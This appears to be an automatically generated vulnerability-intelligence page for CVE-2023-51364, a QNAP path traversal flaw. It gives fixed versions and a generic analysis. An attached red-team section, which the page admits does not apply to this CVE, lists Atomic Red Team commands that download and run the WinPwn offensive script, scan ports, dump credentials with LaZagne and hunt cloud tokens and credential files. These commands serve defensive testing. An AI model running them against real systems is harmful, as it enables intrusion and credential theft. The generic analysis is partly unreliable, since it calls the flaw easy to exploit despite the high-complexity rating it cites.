CVE-2023-51364
Overview
This vulnerability is a path traversal flaw rooted in improper validation of user-supplied file path inputs within QNAP QTS operating system components. The affected functionality fails to sanitize or canonicalize file path parameters, allowing traversal sequences to access files outside intended directories. This impacts multiple QNAP OS variants including QTS, QuTS hero, and QuTScloud, specifically their file handling or network-accessible services that process file path inputs.
Vulnerability Description
A path traversal vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to read the contents of unexpected files and expose sensitive data via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QTS 4.5.4.2627 build 20231225 and later QuTS hero h5.1.3.2578 build 20231110 and later QuTS hero h4.5.4.2626 build 20231225 and later QuTScloud c5.1.5.2651 and later
Impact
An unauthenticated remote attacker can exploit this vulnerability to read arbitrary files on the affected QNAP device by sending crafted requests containing path traversal payloads. This can lead to exposure of sensitive configuration files or credentials stored on the system, facilitating further compromise or data leakage. The exploit requires only network access and no user interaction, as indicated by the CVSS vector AV:N/AC:H/PR:N/UI:N, with impact on integrity and availability due to potential unauthorized information disclosure and system disruption.
Solution
QNAP has addressed this vulnerability in QTS versions 5.1.4.2596 build 20231128 and later, 4.5.4.2627 build 20231225 and later, QuTS hero h5.1.3.2578 build 20231110 and later, QuTS hero h4.5.4.2626 build 20231225 and later, and QuTScloud c5.1.5.2651 and later. Administrators should apply the updates as detailed in QNAP Security Advisory QSA-24-14 (https://www.qnap.com/en/security-advisory/qsa-24-14) to remediate the issue. No alternative mitigations are specified in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A path traversal vulnerability has been identified in several versions of the QNAP operating system, which allows unauthorized access to files outside the intended directory structure. This type of vulnerability occurs when an application does not properly sanitize user input, enabling an attacker to manipulate file paths. By exploiting this flaw, an attacker can potentially read sensitive files stored on the device, including configuration files, user data, and other critical information. The affected operating systems include various builds of QTS, QuTS hero, and QuTScloud, making a significant number of devices susceptible to this issue.
The primary attack vector for this vulnerability involves sending crafted requests that include directory traversal sequences, such as "../", to the affected QNAP systems. An attacker could exploit this by leveraging network access to the device, either through direct access or via a compromised network. Once the attacker successfully manipulates the file path, they can retrieve sensitive information that could be used for further attacks, such as credential harvesting or lateral movement within a network. This exploitation could occur in various scenarios, including remote attacks where the attacker has no physical access to the device, making it particularly concerning for organizations relying on QNAP products for storage and data management.
The real-world impact of this vulnerability is significant, especially for businesses that utilize QNAP devices for storing sensitive data. The potential exposure of confidential information could lead to data breaches, regulatory fines, and reputational damage. Organizations that handle personal identifiable information (PII) or sensitive corporate data are particularly at risk, as the unauthorized disclosure of such information could have severe legal and financial repercussions. Furthermore, the ease of exploitation increases the likelihood of attacks, as threat actors continuously seek out vulnerabilities in widely used products.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to ensure that all QNAP devices are updated to the latest versions that have addressed this vulnerability. Regular patch management practices should be established to keep systems secure against known vulnerabilities. Additionally, organizations should conduct regular security assessments, including vulnerability scanning and penetration testing, to identify any potential weaknesses in their systems. Network segmentation can also be employed to limit access to sensitive devices, reducing the risk of exploitation. Monitoring network traffic for unusual patterns or unauthorized access attempts can further enhance detection capabilities.
In conclusion, the path traversal vulnerability affecting QNAP operating systems poses a serious threat to data security and organizational integrity. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves against exploitation. Implementing robust detection and mitigation strategies will not only protect sensitive data but also help maintain trust with customers and stakeholders in an increasingly complex cybersecurity landscape.
Affected Products (9)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Qnap | Qts | All |
cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:*
|
|
|
Qnap | Qts | All |
cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:*
|
|
|
Qnap | Qts | 4.5.4.2627 |
cpe:2.3:o:qnap:qts:4.5.4.2627:-:*:*:*:*:*:*
|
|
|
Qnap | Qts | 5.1.4.2596 |
cpe:2.3:o:qnap:qts:5.1.4.2596:-:*:*:*:*:*:*
|
|
|
Qnap | Quts Hero | All |
cpe:2.3:o:qnap:quts_hero:*:*:*:*:*:*:*:*
|
|
|
Qnap | Quts Hero | All |
cpe:2.3:o:qnap:quts_hero:*:*:*:*:*:*:*:*
|
|
|
Qnap | Quts Hero | h4.5.4.2626 |
cpe:2.3:o:qnap:quts_hero:h4.5.4.2626:-:*:*:*:*:*:*
|
|
|
Qnap | Quts Hero | h5.1.3.2578 |
cpe:2.3:o:qnap:quts_hero:h5.1.3.2578:-:*:*:*:*:*:*
|
|
|
Qnap | Qutscloud | All |
cpe:2.3:o:qnap:qutscloud:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-51364 |
| qnap.com |
GitHub CVE
|
https://www.qnap.com/en/security-advisory/qsa-24-14 |